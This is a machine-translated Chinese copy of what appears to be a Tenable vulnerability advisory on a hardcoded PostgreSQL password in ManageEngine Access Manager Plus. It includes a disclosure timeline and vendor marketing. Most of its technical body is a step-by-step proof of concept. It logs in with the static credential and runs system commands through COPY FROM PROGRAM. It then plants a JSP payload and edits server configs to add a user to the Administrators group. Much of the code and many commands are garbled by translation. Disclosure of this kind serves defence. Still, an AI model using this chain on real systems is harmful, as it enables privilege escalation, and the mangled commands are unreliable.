脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

Zoho ManageEngine披露硬编码的凭证

剧情简介

静态凭证PostgreSQL中存在数据用于ManageEngine Access Manager + (AMP)构建4309。这些凭证可以允许一个恶意的演员来修改配置数据,将升级他们的权限较低权限的用户管理用户。

PostgreSQL数据库服务器用于安保系统帐户下运行:

C:\Program Files\ ManageEngine \ \ pgsql \本>设置PGPASSWORD = Stonebraker&& psql - h 127.0.0.1: 4567 - p - d AMP - u postgres q
AMP = #删除表如果存在cmd_exec;
注意:表“cmd_exec”并不存在,跳过
AMP = #创建表cmd_exec (cmd_output文本);
AMP = #复制cmd_exec从程序的whoami /用户/组(csv格式,分隔符E ' \ t ');
AMP = # select * from cmd_exec;



用户信息
- - - - - - - - - - - - - - - - -

用户名SID
= = = = = = = = = = = = = = = = = = = = = = = = = = =
nt权威S-1-5-18 \系统


组信息
- - - - - - - - - - - - - - - - - -

组名称类型SID属性
= = = = = = = = = = = = = = = = = = = = = = = = = = = = == = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = == = = = = = = = = = = = = = = = = = = =
内装式\管理员别名s - 1 - 5 - 32 - 544组仅用于否认
每个人都知名组S-1-1-0强制性组,默认启用,启用组
NT AUTHORITY)著名\经过身份验证的用户组S-1-5-11强制性组,默认启用,启用组
强制性标签\系统强制级别标签s - 1 - 16 - 16384
(18行)


AMP = #

如上所示,系统账户属于本地Administrators组,但其成员检查时才会被拒绝访问ace,适用于SID s - 1 - 5 - 32 - 544。令ace的SID被忽略。这意味着系统没有权限授予本地Administrators组。

因此,操作,比如添加一个较低权限用户本地Administrators组会失败(拒绝访问):

C:\Program Files\ ManageEngine \ \ pgsql \本>设置PGPASSWORD = Stonebraker&& psql - h 127.0.0.1: 4567 - p - d AMP - u postgres q
AMP = #删除表如果存在cmd_exec;
注意:表“cmd_exec”并不存在,跳过
AMP = #创建表cmd_exec (cmd_output文本);
AMP = #复制cmd_exec从项目的净本地群组管理员user1 /添加> c: \ \ Windows \ \ Temp \ \。txt 2 > & 1”;
错误:程序“网络本地群组管理员user1 /添加> C: \ \ Windows \ \ Temp \ \。txt 2 > & 1”失败了
细节:子进程退出,退出码2
AMP = #复制cmd_exec从“C: \ \ Windows \ \ Temp \ \ out.txt”;
AMP = # select * from cmd_exec;
cmd_output
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
发生了系统错误5。

访问被拒绝。

(4行)


AMP = #


然而,ManageEngine Access Manager + (AMP) Windows服务(Tomcat java.exe)是用管理员权限运行。低权限用户运行命令作为PostgreSQL服务器可以改变放大器配置文件并重新启动安保服务。用户可以删除一个JSP文件AMP webapp根,因为它要执行安全上下文下的安保服务。这允许用户添加本地Administrators组。

概念验证
创建一个低权限的Windows用户(即。user1,加入用户和远程桌面用户)

(即创建一个JSP文件。test.jsp)补充道,低权限用户管理员组
< % Runtime.getRuntime ()。exec (cmd / c \“净本地群组管理员user1 /添加\ " ");% >

作为user1登录AMP Windows主机并验证user1并不是一个管理员组的成员
C:\Users\ user1 >净用户user1 |中管理员
C:\Users\ user1 >


登录到本地PostgreSQL服务器使用硬编码的凭证
C:\Users\ user1 > cd C:\Program Files\ ManageEngine \ \ pgsql \
C:\Program Files\ ManageEngine \ \ pgsql \本>设置PGPASSWORD = Stonebraker&& psql - h 127.0.0.1: 4567 - p - d - u postgres


将JSP文件复制到AMP webapp根上下文下的系统账户
AMP = #删除表如果存在cmd_exec;
AMP = #创建表cmd_exec (cmd_output文本);
AMP = # cmd_exec从程序的副本复制c: \ \ user1 \用户测试。jsp“C: \ Program Files \ ManageEngine \ \webapps \ Amp \”;


security-common-onpremise副本。xml用户的主目录
AMP = #复制cmd_exec从程序的副本“C: \ PROGRAM Files \ ManageEngine \ AMP \ conf \security-common-onpremise。xml用户“c: \ \ user1 \ ';

添加以下URL入口在security-common-onpremise.xml < URL >元素下。这是为了确保/测试。jsp SecurityFilter不会阻塞。
< url路径= " /测试。jsp "描述= " "方法= ",post " / >

security-common-onpremise复制修改。xml回到它的位置
AMP = # cmd_exec从程序的副本复制c: \ \ user1 \安全——用户common-onpremise。xml“C: \ Program Files \ ManageEngine \ AMP \ conf \”的;

复制tomcat web。xml用户的主目录
AMP = #复制cmd_exec从程序的副本“C: \ PROGRAM Files \ ManageEngine \ AMP \ conf \网络。xml用户“c: \ \ user1 \ ';

添加以下配置< web >元素下web . xml。这允许/测试。jsp执行jsp servlet。
< servlet >
< < servlet-name > jsp / servlet -名称>
< servlet类>表示。jasper.servlet.JspServlet < /servlet类>
<初始化>
< param-name >叉< / param-name >
<参数值>假< / param -值>
< /初始化>
< load-on-startup > < /负载- 1启动>
< / servlet >
< servlet映射>
< < servlet-name > jsp / servlet -名称>
< url模式> < / url - * . jsp模式>
< / servlet映射>


复制修改web。xml回到它的位置
AMP = # cmd_exec从程序的副本复制c: \ \ user1 \ web用户。xml“C: \ Program Files \ ManageEngine \ AMP \ conf \”的;

重新启动AMP web服务,以便修改。xml和security-common-onpremise。xml可以生效
注意重启安保服务将PostgreSQL连接下跌,因为PostgreSQL服务器发起的安保服务
AMP = #从程序复制cmd_exec powershell。exe - command“Restart-Service amp force”;

等到安保服务重新启动通过检查https:// < amp-host >: 9292 /在一个web浏览器
执行/测试。jsp添加user1管理员
旋度滑雪的https:// < amp-host >: 9292 /测试。jsp的

下线user1并再次检查用户重新登录会员
C:\Users\ user1 >净用户user1 |中管理员
本地组成员*管理员*远程桌面用户

C:\Users\ user1 >

解决方案

没有供应商提供的解决方案是可用的。请联系ManageEngine支持减排援助。

披露时间表

2023年1月23日—站得住脚的披露信息给供应商。
2023年1月23日—供应商承认收据。
2023年2月22日—站得住脚的请求状态更新。
2023年2月23日—供应商承认请求。州补丁是在进步。
2023年3月6日——站得住脚的请求状态更新。
2023年3月7日,供应商承认请求和州补丁应该本月公布。他们说他们会通知我们之前发布。
2023年4月5日——站得住脚的请求状态更新。
2023年4月7日——供应商州发布补丁没有准备好,但将在未来几周内公布。
2023年4月21日—站得住脚的提醒供应商披露的最后期限。
2023年4月24日—供应商请求披露时间表扩展。
2023年4月25日—站得住脚的否认请求引用策略中引用原始披露。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
交易- 2023 - 16
CVSSv3基地/时间的分数
8.8/8.3
CVSSv3向量
AV: L /交流:L /公关:L / UI: N / S: C / C: H /我:H: H
受影响的产品
ManageEngine Access Manager +
ManageEngine密码管理器支持
ManageEngine PAM360
风险因素

咨询时间

2023年4月25日—初始释放。

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map